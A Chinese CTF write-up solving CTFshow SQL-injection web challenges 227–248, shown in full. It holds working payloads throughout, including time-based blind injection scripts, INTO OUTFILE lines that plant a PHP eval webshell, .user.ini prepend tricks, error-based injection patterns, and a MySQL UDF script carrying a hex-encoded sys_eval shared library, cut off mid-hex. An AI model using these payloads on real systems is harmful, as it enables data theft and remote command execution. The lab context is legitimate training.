Bootstrap

CTFshow-WEB入门-SQL注入(下)

web227

按照上一题的方法,发现查不出flag表了,把ctfshow_user表给爆了一下也没flag,然后写一句话马,蚁剑连上去还是找不到flag,人傻了。。。

看了一下y4师傅的WP,原来这题考的是存储过程:

存储过程(Stored Procedure)是一种在数据库中存储复杂程序,以便外部程序调用的一种数据库对象。

存储过程是为了完成特定功能的SQL语句集,经编译创建并保存在数据库中,用户可通过指定存储过程的名字并给定参数(需要时)来调用执行。

存储过程思想上很简单,就是数据库 SQL 语言层面的代码封装与重用。

毕竟我们不是开发,没必要了解的那么深。我对于存储过程的理解就是用户自定义的函数,就是PHP,python里面自己写函数一样。
再参考一下这个:MySQL——查看存储过程和函数

查一下information_schema.routines表,就可以发现一个getFlag的存储过程:
在这里插入图片描述
还给出了这个存储过程的定义:

BEGIN
SELECT "ctfshow{3b8b089d-6aaf-4176-9060-89786fcca3ba}";
END

所以直接就能得到flag了。如果要调用的话,也可以这样:

';call getFlag();

不过正常这题都是在之前姿势的基础上,还是要16进制编码。我这里没编码是因为我之前已经写马蚁剑连了上去,发现api/index.php有写的权限,我直接把过滤了删了才可以这样搞的。

web228

同web226

web229

同web226

web230

同web226

web231

首先说一下注入点,在api/index.php,post传参password和username。。日常找不到注入点。
这题我第一反应的话是二次注入,因为update更新后的结果在update.php那里有回显,布尔注入,时间注入甚至都可以。我第一反应是这样:

password=0'+substr(hex(hex(database())),1,10)%23&username=1

利用双层hex来二次注入,但是感觉肯定是有些麻烦的,这题一点过滤都没有不太可能这样。然后想着为什么只能password那里回显,username不能回显呢,然后就想到了直接写username:

password=0',username=database()%23&username=1

username那里的语句随便写就可以了。

看了一下yq师傅的博客,这题其实不需要注意,因为查询的是不同的表:

mysql中不支持子查询更新,准确的说是更新的表不能在set和where中用于子查询。那串英文错误提示就是说,不能先select出同一表中的某些值,再update这个表(在同一语句中)。

如果flag在update的那个表里面,我们想查出来的话就需要用子查询了,参考文章如下:
mysql update不支持子查询更新

web232

同上

web233

不知道为什么不能像前两个题那样做了,搞不明白为什么。但是不能的话那就只能盲注了,把之前的脚本改一改就行了,需要注意的就是sleep那里,是每一列都会sleep一次,所以判断的时间限制要大致算一下:

"""
Author:feng
"""
import requests
from time import *
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num

url='http://e3a564a9-8fda-4003-895a-404b571895a4.chall.ctf.show:8080/api/'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.02),1)#".format(i,j)
        #payload="' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))<{},sleep(0.02),1)#".format(i,j)
        payload="' or if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))<{},sleep(0.02),1)#".format(i,j)

        data={
            'password':'1',
            'username':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.35)
            min=j
        except:
            max=j

        sleep(0.2)
    sleep(1)

web234

还是很懵,明明没过滤为什么又打不通了。。。
看了一下师傅们的wp,原来有过滤啊草。。。把单引号给过滤了,我太菜了。
所以这题就可以利用反斜杠把单引号转义,例如这样:

password=\&username=,username=database()#

相当于查询语句变成了这样:

update ctfshow_user set pass = '\' where username = ',username=database()#';

然后在username那里构造语句就可以了。

web235

ban了or,其实还暗ban了information_schema,可以拿innoDB引擎来绕过,即这个mysql.innodb_table_stats。

概述MySQL统计信息

password=\&username=,username=(select group_concat(table_name) from mysql.innodb_table_stats where database_name=database())#

把表名给爆了出来,接下来就是无列名注入了:
sql注入(利用join进行无列名注入)

password=\&username=,username=(select group_concat(`2`) from (select 1,2,3 union select * from flag23a1)x)#

比较经典的姿势了。
也可以参考这篇文章,很全:
Bypass information_schema与无列名注入

web236

这题没太懂啥意思。。。以为是输入过滤,想了好久想不到太好的办法,看了大师傅们的WP是输出过滤???但是这题的输出里是ctfshow{开头,也没flag啊。。。然后我试了这个:

password=\&username=,username="flag"#

照样可以把username改成flag,输出也没过滤啊。。。。不懂为什么。。。这题可能有些问题吧?
所以按照上题的姿势就可以了。

web237

insert注入,没任何过滤,直接闭合单引号,然后自己构造查询语句,把查询的结果insert到表里就行了:

username=1',(select group_concat(table_name) from information_schema.tables where table_schema=database()))#&password=1
username=1',(select group_concat(flagass23s3) from flag))#&password=1

web238

过滤了空格,那就拿括号绕过一下:

username=2',(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())))#&password=1
username=2',(select(group_concat(column_name))from(information_schema.columns)where(table_name='flagb')))#&password=1

web239

没啥好说的,过滤了or,和之前的套路一样,用mysql.innodb_table_stats。正常接下来是要无列名注入的,但是因为ban了*,正常的子查询无列名注入好像就不太行了?我能构造出这个:

select(group_concat(`2`))from(select(1),2,(3)union(select(`*`)from(flagbb)))x

但是毕竟把*给过滤了,想了想不知道怎么在不利用*的情况下把flagbb所有表数据都查出来。至于join的子查询和逐位比较都需要*,所以就不知道该怎么办了。突然想到之前的表的列名都是flag,所以直接查flag,成功了。。。不知道这题子查询的话应该怎么绕过星号的过滤。

web240

没啥好说的,sys,or,mysql都ban了,这表名肯定是爆不出来了,根据hint写脚本猜吧,列名大概率还是flag:

import requests
url_insert="http://517b800b-509d-4bc2-950e-559745adb2ce.chall.ctf.show:8080/api/insert.php"

for v1 in "ab":
    for v2 in "ab":
        for v3 in "ab":
            for v4 in "ab":
                for v5 in "ab":
                    v="flag"+v1+v2+v3+v4+v5
                    data={
                        'username':"1',(select(group_concat(flag))from({})))#".format(v),
                        'password':'1'
                    }
                    r=requests.post(url=url_insert,data=data)
                    
                    

程序跑完了去page.php那里逆序,就可以看到flag了。

web241

delete注入,想了一下不能布尔盲注,所以只能时间盲注。注意一下响应时间是条数乘上sleep的时间即可:

"""
Author:feng
"""
import requests
from time import *
def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
        return num

url='http://224c4817-ece7-46e4-a9a5-185fdce4e641.chall.ctf.show:8080/api/delete.php'

flag=''
for i in range(1,100):
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag)
            if chr(j)=='}':
                exit()
            break

        #payload="if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.01),1)".format(i,j)
        #payload="if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag'),{},1))<{},sleep(0.01),1)".format(i,j)
        payload="if(ascii(substr((select group_concat(flag) from flag),{},1))<{},sleep(0.01),1)".format(i,j)

        data={
            'id':payload
        }
        try:
            r=requests.post(url=url,data=data,timeout=0.2)
            min=j
        except:
            max=j

        sleep(0.2)
    sleep(1)

提高准确率还是老套路,sleep的时间甚至0.1秒也可以,但是只要每条请求之间间隔一定的时间,跑出来就不会出错了,要是一直请求就会出问题。所以最后加上sleep(0.2)和sleep(1)。

web242

又是姿势盲区,看了一下,into oufile后面似乎没有什么东西可以加了,就很迷。看了一下yq1ng师傅的博客:

SELECT ... INTO OUTFILE 'file_name'
        [CHARACTER SET charset_name]
        [export_options]

export_options:
    [{FIELDS | COLUMNS}
        [TERMINATED BY 'string']//分隔符
        [[OPTIONALLY] ENCLOSED BY 'char']
        [ESCAPED BY 'char']
    ]
    [LINES
        [STARTING BY 'string']
        [TERMINATED BY 'string']
    ]
“OPTION”参数为可选参数选项,其可能的取值有:

`FIELDS TERMINATED BY '字符串'`:设置字符串为字段之间的分隔符,可以为单个或多个字符。默认值是“\t”。

`FIELDS ENCLOSED BY '字符'`:设置字符来括住字段的值,只能为单个字符。默认情况下不使用任何符号。

`FIELDS OPTIONALLY ENCLOSED BY '字符'`:设置字符来括住CHAR、VARCHAR和TEXT等字符型字段。默认情况下不使用任何符号。

`FIELDS ESCAPED BY '字符'`:设置转义字符,只能为单个字符。默认值为“\”。

`LINES STARTING BY '字符串'`:设置每行数据开头的字符,可以为单个或多个字符。默认情况下不使用任何字符。

`LINES TERMINATED BY '字符串'`:设置每行数据结尾的字符,可以为单个或多个字符。默认值是“\n”。

看完了这些东西,就知道该怎么写马了。这三个选项都可以:

  • FIELDS TERMINATED BY
  • LINES STARTING BY
  • LINES TERMINATED BY
filename=3.php' LINES STARTING BY '<?php eval($_POST[0]);?>'#

学到了,学到了。

web243

没想出来怎么做,看了一下yq1ng师傅的博客,太离谱了。。。这题最大的坑点就是/dump/index.php这里。403forbidden你告诉我这里有index.php的???
在这里插入图片描述
上面是文件包含过了的结果。草。。。我直接口吐芬芳,太离谱了。
知道了有了index.php,很容易想到上传.user.ini了。但是这里需要注意一下格式,payload如下:

filename=.user.ini' LINES STARTING BY ';' TERMINATED BY 0x0a6175746f5f70726570656e645f66696c653d66656e672e6a70670a#

首先让每一行以分号开始,这样就可以把数据库查出来的那些东西给注释掉。
然后以那个字符串结尾,这个字符串16进制解密出来是这个:


auto_prepend_file=feng.jpg

前面有一个回车,这样auto_prepend_file可以另起一行,不会被注释。最后还有一个回车,这样就和接下来的一行注释分开,是这样:

;1	ctfshow	ctfshow
auto_prepend_file=feng.jpg
;2	user1	111
auto_prepend_file=feng.jpg
;3	user2	222
auto_prepend_file=feng.jpg
;4	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;5	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;6	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;7	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;8	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;9	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;10	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;11	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;12	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;13	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;14	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;15	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;16	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;17	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;18	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;19	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;20	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg
;21	userAUTO	passwordAUTO
auto_prepend_file=feng.jpg

然后再传feng,jpg就可以了,因为过滤了php,可以用短标签或者十六进制绕过:

filename=feng.jpg' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b305d293b3f3e#

在这里插入图片描述
再吐槽一下index.php,这不是坑人吗???

web244

无过滤的报错注入,随便选一种方式就可以了:

?id=' or updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)-- -

?id=' or updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flag'),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),1,32),1),1)-- -

' or updatexml(1,concat(1,substr((select group_concat(flag) from ctfshow_flag),20,32),1),1)-- -

因为xpath的报错只有32位,所以需要截取。

web245

updatexml被过滤了,还有extractvalue姿势如下:

?id=' or extractvalue(1,concat(0x7e,database(),0x7e))-- -

剩下的就不多写了,一样的姿势。

web246

extractvalue被过滤了,还有双查询报错。
参考一下我以前写的一个报错注入的博客:
报错注入
常用的报错注入基本就是这些。双查询注入的原理里面也有文章提高的,而且讲得很透彻。

姿势如下:

?id=' union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 1,1),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

这题坑的地方就是不能用group_concat,必须用limit,不知道为什么。

?id=' union select 1,count(*),concat((select flag2 from ctfshow_flags),0x7e,floor(rand()*2))a from information_schema.columns group by a-- -

查flag是这样,之所以没用substr之类的,是因为双查询报错注入没有长度限制,所以不需要切片就可以直接得到完整的flag。

web247

如果还是考虑双查询注入的话,把floor给过滤了,考虑到rand()*2是0-2的范围,所以不用floor,ceil也可以,是向上取整。round函数也可以,

ROUND(X) – 表示将值 X 四舍五入为整数,无小数位
ROUND(X,D) – 表示将值 X 四舍五入为小数点后 D 位的数值,D为小数点后小数位数。若要保留 X 值小数点左边的 D 位,可将 D 设为负值。

一共十二种报错注入,其他的行不行呢?

1. floor + rand + group by
select * from user where id=1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
select * from user where id=1 and (select count(*) from (select 1 union select null union select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2)));

2. ExtractValue
select * from user where id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

3. UpdateXml
select * from user where id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1));

4. Name_Const(>5.0.12)
select * from (select NAME_CONST(version(),0),NAME_CONST(version(),0))x;

5. Join
select * from(select * from mysql.user a join mysql.user b)c;
select * from(select * from mysql.user a join mysql.user b using(Host))c;
select * from(select * from mysql.user a join mysql.user b using(Host,User))c;

6. exp()//mysql5.7貌似不能用
select * from user where id=1 and Exp(~(select * from (select version())a));

7. geometrycollection()//mysql5.7貌似不能用
select * from user where id=1 and geometrycollection((select * from(select * from(select user())a)b));

8. multipoint()//mysql5.7貌似不能用
select * from user where id=1 and multipoint((select * from(select * from(select user())a)b));

9. polygon()//mysql5.7貌似不能用
select * from user where id=1 and polygon((select * from(select * from(select user())a)b));

10. multipolygon()//mysql5.7貌似不能用
select * from user where id=1 and multipolygon((select * from(select * from(select user())a)b));

11. linestring()//mysql5.7貌似不能用
select * from user where id=1 and linestring((select * from(select * from(select user())a)b));

12. multilinestring()//mysql5.7貌似不能用
select * from user where id=1 and multilinestring((select * from(select * from(select user())a)b));

具体的我也没一一尝试,试了试exp报错注入不行所以下面的估计都不行了,那就拿round和ceil了。
需要注意的就是flag列是flag?。但是?这个字符直接flag?的话会报错,加上反引号:

?id=' union select 1,count(*),concat(0x7e,0x7e,(select `flag?` from ctfshow_flagsa limit 0,1),0x7e,ceil(rand()*2))a from information_schema.columns group by a-- -

web248

mysql的UAF注入也是第一次见,具体的操作网上有很多的文章,简单来说就是把dll文件写到目标机子的plugin目录,这个目录是可以通过select @@plugin_dir来得到的。此外就是这题可以堆叠注入,我一开始没想到可以堆叠,以为是布尔,其实还是没理解这个UAF注入,最后的导入函数这里:

CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; //导入udf函数

肯定会需要堆叠,所以一定可以堆叠注入,不能堆叠注入就GG。

利用的是大师傅的脚本,学习了:

import requests

base_url="http://6de1e55c-ad86-4d42-a5bc-7d6205404db6.chall.ctf.show:8080/api/"
payload = []
text = ["a", "b", "c", "d", "e"]
udf = "7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C8140000000000001000000000000000000000000000000008000000000000000000000000000000B1000000010000000300000000000000D814200000000000D8140000000000001000000000000000000000000000000008000000000000000000000000000000B8000000010000000300000000000000E814200000000000E8140000000000000800000000000000000000000000000008000000000000000000000000000000BD000000010000000300000000000000F014200000000000F0140000000000000800000000000000000000000000000008000000000000000000000000000000CA000000060000000300000000000000F814200000000000F8140000000000008001000000000000040000000000000008000000000000001000000000000000D3000000010000000300000000000000781620000000000078160000000000001800000000000000000000000000000008000000000000000800000000000000D8000000010000000300000000000000901620000000000090160000000000008000000000000000000000000000000008000000000000000800000000000000E1000000080000000300000000000000101720000000000010170000000000001000000000000000000000000000000008000000000000000000000000000000E60000000100000030000000000000000000000000000000101700000000000059000000000000000000000000000000010000000000000001000000000000001100000003000000000000000000000000000000000000006917000000000000EF00000000000000000000000000000001000000000000000000000000000000010000000200000000000000000000000000000000000000581F00000000000068070000000000001B0000002C00000008000000000000001800000000000000090000000300000000000000000000000000000000000000C02600000000000042030000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000100900100000000000000000000000000000000000003000200B80100000000000000000000000000000000000003000300700200000000000000000000000000000000000003000400E80500000000000000000000000000000000000003000500860700000000000000000000000000000000000003000600D00700000000000000000000000000000000000003000700F00700000000000000000000000000000000000003000800500800000000000000000000000000000000000003000900880900000000000000000000000000000000000003000A00A00